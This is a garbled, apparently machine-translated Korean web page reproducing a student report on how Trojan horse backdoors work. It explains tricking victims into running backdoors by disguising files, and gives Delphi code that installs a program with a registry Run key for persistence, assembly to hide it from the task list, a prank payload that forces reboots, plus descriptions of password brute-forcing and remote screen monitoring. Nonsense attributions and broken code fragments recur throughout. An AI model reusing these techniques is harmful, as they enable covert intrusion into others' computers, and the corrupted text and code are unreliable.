컴퓨터 지식 네트워크 - 컴퓨터 사무실 - 컴퓨터 네트워크에서' 뒷문' 은 무슨 뜻인가요?

컴퓨터 네트워크에서' 뒷문' 은 무슨 뜻인가요?

컴퓨터 네트워크의' 백도어' 는 네트워크의 취약점

1, 문제 제기

"the internet is now more like an unlocked diary, With millions of consumers divulging marketable details of their personal lives, from where they live to what they eat for dinner. "이것은 유명한 익명 서버입니다 네, 어느새 E 시대가 도래했고 인터넷은 우리 생활에 현란함과 다채로움을 더했습니다. 하지만 이 오색찬란한 세상 밑에는 흑조, 즉 해커가 잠복해 있다. (윌리엄 셰익스피어, 해커, 해커, 해커, 해커, 해커, 해커, 해커, 해커, 해커) 이 명사는 점점 더 세인들의 관심을 끌고 있고, 영향이 커지고 있으며, 해커 사건에 대한 보도도 많아지고 있다. 해커는 네트워크와 함께 성장한다. 컴퓨터와 네트워크에 열광하는 사람들을 말한다. 그들은 끊임없이 컴퓨터와 인터넷 지식을 연구하고, 컴퓨터와 네트워크의 허점을 발견하고, 어려운 네트워크 시스템에 도전하는 것을 좋아하고, 가능한 모든 방법으로 네트워크의 크기 허점을 찾고, 네트워크 관리자에게 허점을 해결할 것을 건의한다. 진정한 해커는 대부분 정의감을 부여받은 것이다. 그들은 다른 사람의 시스템에 악의적으로 침입하지 않고 시스템 프로그램과 데이터를 파괴하지 않는다. 그러나 어떤 사람들은 특히 해커를 숭배하고, 컴퓨터 네트워크를 이용해 사방을 어지럽히고, 해커 소프트웨어를 찾아다니며, 여기저기 망가뜨리는 것을 좋아하는데, 이런 사람들은 인터넷에서 가장 위험한 사람이어야 한다. (윌리엄 셰익스피어, 햄릿, 컴퓨터명언) 요즘 언론은 이런 사람을 해커로 혼동했고,' 해커' 라는 단어도 따라서 비하적인 단어가 되었다. (윌리엄 셰익스피어, 해커, 해커, 해커, 해커, 해커, 해커) < P > 현재 해커 소프트웨어가 매우 많아 Back Orific, 빙하, YAI 가 곳곳에 있다. 인터넷을 접한 후, 나는 해커 소프트웨어가 도대체 어떻게 편성되었을까 하는 생각을 자주 한다. 내가 해커 소프트웨어를 만들 수 있다면 얼마나 좋을까! 인터넷실에서 수업할 때 일부 해커 소프트웨어를 제어 도구로 사용하여 학생의 기계 (예: 빙하) 를 제어할 수 있기 때문에 이것은 나쁜 일을 하려는 것이 아니다. 해커 소프트웨어 자체가 바이러스와는 달리 나쁜 것이 아니라 바른 길에 쓸 수 있다는 것을 알 수 있다. 나의 모색을 거쳐 초보적으로 몇 가지 설계 방법을 익혔는데, 주로 트로이 목마 프로그램이다. 이번 졸업 디자인, 나는 아날로그 해커 침입 프로그램, 못된장난 프로그램, 인터넷에서 다른 사람이 기계에서 무엇을 하고 있는지 가로채는 프로그램을 설계했다. 몇 가지 프로그램은 순전히 실험에 쓰이며, 다른 목적은 없다. 여기서 선생님들께 보고하겠습니다. 프로그래밍 언어는 파스칼로 델파이 4 로 컴파일됩니다. < P > 2, "트로이 목마" 가 시스템을 침범하는 방법 < P > 완전한 "트로이 목마" 는 일반적으로 두 부분으로 나뉩니다. 하나는 "뒷문" 이 열린 시스템을 제어하는 ​​데 사용되는 고객 서비스 프로그램 (Client) 입니다. 다른 하나는' 뒷문' 프로그램으로, 어떤 기계를 개방하는 데 사용한다. 만약 우리가 어떤 컴퓨터를 통제하고 싶다면, 우리는 몇 가지 수단을 통해' 백도어' 프로그램을 그 컴퓨터로 전달하고 작동시켜서, 그 컴퓨터가 특수한 FTP 서버가 될 수 있도록 한다. 그런 다음 클라이언트 프로그램을 사용하여 컴퓨터를 제어 할 수 있습니다. 물론 뒷문 프로그램이 실행되지 않으면 역할을 할 수 없다. 그러므로 다른 사람을 속여 뒷문 프로그램을 사용해야 한다. 친구나 지인이라면, 그들의 신뢰를 이용하여 그를 운영하게 하면 된다. 낯선 사람이라면 대화방에서 그들과 가까워질 수 있고, 일단 신뢰를 얻으면, 프로그램을 보내서 운행을 유인할 수 있다. 물론, 프로그램은 뒷문 프로그램을 개명하거나, README 등으로 바꾸거나, 접미사를 변경하여 GIF, BMP 등으로 바꿀 수 있습니다. 그들이 이 파일들을 두 번 클릭하면' 도둑선' 에 오르게 됩니다. (존 F. 케네디, Northern Exposure (미국 TV 드라마), 예술명언) 또한 WINZIP 을 사용하여 백도어 프로그램과 무언가를 자체 압축 해제 패키지로 만든 다음 설정 압축 해제 후 자동으로 SETUP 프로그램 실행 기능을 사용하여 지정된 백도어 프로그램을 실행할 수 있습니다. 요컨대, 모든 수단을 이용하여 사람들이 뒷문 프로그램을 실행하도록 해야 한다.

트로이 목마 프로그램이 실행되면 향후 시스템 부팅 후 트로이 목마가 자동으로 실행되도록 시스템이 다양한 방식으로 수정됩니다. 수정 방법은 일반적으로

HKEY _ local _ machine \ software \ Microsoft \ windows \ currentversion \ run 및 <; 다음 코드는 레지스트리를 수정하고 API 함수를 호출하여 시스템 디렉토리를 확인하고 파일을 복사하여 시스템 침입 목적을 구현할 수 있습니다.

unit Unit1;

interface

uses

windows, messages, sysutils, classes, graphics, controls, forms.

유형

tform1 = class (tform)

button1: tbutton;

Button2: TButton;

procedure button1 click (sender: tobject);

procedure button 2 click (sender: tobject);

private

{private declarations}

public

{public declarations}

end;

var

Form1: TForm1;

구현

{$ r *. DFM}

procedure tform 1.button1 click (sender: tobject)

var

regf:tregistry;

sysdir:pchar;

temp:string;

begin

getmem(sysdir,256);

getsystemdirectory (sysdir, 128);

temp:=sysdir+'\client.exe';

freemem(sysdir,256);

regf:=tregistry.create;

regf.rootkey: = HKEY _ local _ machine;

regf.openkey ('software \ Microsoft \ windows \ currentversion \ run', true);

regf.writestring(' ',temp);

regf.free;

copyfile (pchar ('hacker.exe'), pchar (temp), true);

end;

procedure tform 1.button2 click (sender: tobject);

begin

close;

end;

end.

시스템 파일을 감염시켜 프로그램 파일에 부착하는 영리한 프로그램도 있습니다. 나는 이것이 어떻게 이루어졌는지 아직 정확히 알지 못했다.

Windows 에서 Ctrl+Alt+Del 을 누르면 현재 실행 중인 프로그램이 표시됩니다. 따라서 트로이 목마 프로그램이 노출되지 않습니까? 다음 어셈블리 코드는 DELPHI 또는 C++ 에 쉽게 내장될 수 있어 다른 사람이 프로그램을 볼 수 없도록 숨길 수 있습니다. < P > ASM < P > Movebx, 3H < P > Push ES < P > Push FS <;

이 어셈블리 코드가 프로그램을 숨길 수있는 이유는 무엇입니까? 자료에 따르면 WINDOWS 9X 에서 응용 프로그램을 로드할 때 FS 가 가리키는 세그먼트는 DOS 응용 프로그램과 유사한 PSP 로, 응용 프로그램에 대한 중요한 데이터가 들어 있습니다. Ctrl+Alt+Del 을 누르면 응용 프로그램에 대해 표시할 수 있는 ENABLE 창의 이름이 없으면 시스템에서 위 프로그램을 확인해야 합니다. < P > 다음은 못된장난 프로그램으로, 컴퓨터를 해킹한 후 매번 전원을 켤 때마다 무작위로 마우스를 뛰어다니며 괴음, 열시작, 강제 종료 현상을 발생시켜 WINDOWS 9X 에 들어갈 수 없게 한다. 일반 컴퓨터 사용자의 경우 프로그램이 어디에 있는지 알 수 없기 때문에 시스템 영역을 포맷하고 시스템을 다시 설치할 수 있습니다.

프로그램 하커;

uses

windows;

var temp:integer;

begin

ASM

movebx, 3h

push es

push fs

popes

movebx, eeb

randomize;

temp:=random(3);

if temp = then

while (true) do

begin

messagebeep ();

setcursorpos (random (64), random (48));

end

else if temp = 1then

exitwindowsex (ewx _ reboot, )

else exitwindowsex >

end.

일부 트로이 목마는 발견 후 지워지는 것을 막기 위해 부팅 시 백업을 생성합니다. 일반적으로 WINDOWS 에 감염된 시스템 파일입니다. 트로이 목마가 발견되고 제거되면 백업이 자동으로 활성화되므로 원격 블랙핸드를 제어할 수 있습니다. 예를 들어 현재 국가에서 가장 성행하는' 빙하' 는 먼저 레지스트리의 시작 항목을 수정하고, 자신을 시스템에 각각 KERNEL32.EXE 와 SYSEXPLE.EXE 로 복사하고, TXT 파일이 열리는 방식을 수정하며, 일단 KERNEL32.EXE 가 삭제되면 1 을 엽니다.

또한 일부 트로이 목마는 실행 후 파일 이름을 수정하거나 감염 시스템을 복제한 후 자가 파괴해 사용자가 찾기가 어렵다. < P > 3, 트로이 목마 종류

1, 파괴형 < P > 의 유일한 기능은 파일을 파괴하고 삭제하는 것으로, 컴퓨터에서 DLL, INI, EXE 파일을 자동으로 삭제할 수 있습니다.

2, 암호 전송형 < P > 은 숨겨진 암호를 찾아 지정된 사서함으로 보낼 수 있습니다. 어떤 사람들은 자신의 각종 비밀번호를 파일 형식으로 컴퓨터에 저장하는 것을 좋아해서 이렇게 편리하다고 생각한다. 또 다른 사람들은 WINDOWS 에서 제공하는 비밀번호 기억 기능을 사용하기를 좋아해서 매번 비밀번호를 입력할 필요가 없습니다. 많은 해커 소프트웨어가 이 파일들을 찾아 해커에게 보낼 수 있다. 일부 해커 소프트웨어는 장기간 잠복해 운영자의 키보드 동작을 기록하며 유용한 비밀번호를 찾는다. < P > 문서에 암호를 넣고 중요한 기밀 파일을 공용 컴퓨터에 보관한다고 생각하지 마십시오. 그러면 큰 오산이라는 점을 상기시켜 주세요. (데이비드 아셀, Northern Exposure (미국 TV 드라마), 컴퓨터명언) 다른 꿍꿍이가 있는 사람은 완전히 궁법폭력으로 너의 비밀번호를 해독할 수 있다. WINDOWS API 함수 EnumWindows 및 EnumChildWindows 를 사용하여 현재 실행 중인 모든 프로그램의 모든 창 (컨트롤 포함) 을 반복하고, 창 제목을 통해 비밀번호 입력 및 확인 재입입 창을 찾고, 버튼 제목을 통해 클릭해야 하는 버튼을 찾고, ES_PASSWORD 를 통해 입력해야 하는 암호 창을 찾습니다. 비밀번호 입력 창에 WM_SETTEXT 메시지 보내기 시뮬레이션 비밀번호 입력, 버튼 창에 WM_COMMAND 메시지 보내기 시뮬레이션 클릭. 해독 과정에서 암호를 한 파일에 저장하여 다음 시퀀스의 암호가 다시 한 번 또는 여러 대의 기계를 동시에 분담하여 비밀번호를 찾을 때까지 분담할 수 있도록 합니다. 이런 프로그램은 해커 사이트에서 쉽게 구할 수 있고, 프로그램 설계에 정통한 사람은 완전히 스스로 편찬할 수 있다.

3, 원격 액세스형

은 트로이 목마로, 서비스측 프로그램을 실행하기만 하면 고객이 서비스측의 IP 주소를 알면 원격 제어를 가능하게 한다. 다음 절차는' 피해자' 가 무엇을 하고 있는지 관찰할 수 있다. 물론 이 프로그램은 학생기의 조작을 감시하는 것과 같이 바른 길에서 완전히 사용될 수 있다. < P > 프로그램에서 사용되는 UDP(User Datagram Protocol) 는 인터넷에서 널리 사용되는 통신 프로토콜 중 하나입니다. TCP 프로토콜과 달리 연결되지 않은 전송 프로토콜로, 확인 메커니즘이 없고 신뢰성이 TCP 보다 낮지만 TCP 보다 효율이 높기 때문에 원격 화면 모니터링에 적합합니다. 서버측과 클라이언트를 구분하지 않고 송신자와 수신측만 구분하며 프로그래밍이 쉬워 UDP 프로토콜을 선택했습니다. DELPHI 에서 제공하는 TNMUDP 컨트롤은 이 프로그램에서 사용됩니다.

관리 대상 프로그램 섹션:

제어 CUDP 가 관리 대상 컴퓨터의 1111 포트를 모니터링하고 데이터가 해당 포트로 전송될 때 제어 CUDP 의 ONDATARECEIVED 이벤트를 트리거하도록 합니다. REMOTEPORT 등록 정보를 2222 로 설정하면 CUDP 컨트롤이 데이터를 전송할 때 주 컴퓨터의 2222 포트로 데이터가 전송됩니다.

단위 단위 단위 1;

interface

uses

windows, messages, sysutils, classes, graphics, controls, forms.

上篇: 공책 시간은 항상 바꿔야 한다. 下篇: 호위 차량의 블루투스 연결 방법
관련 내용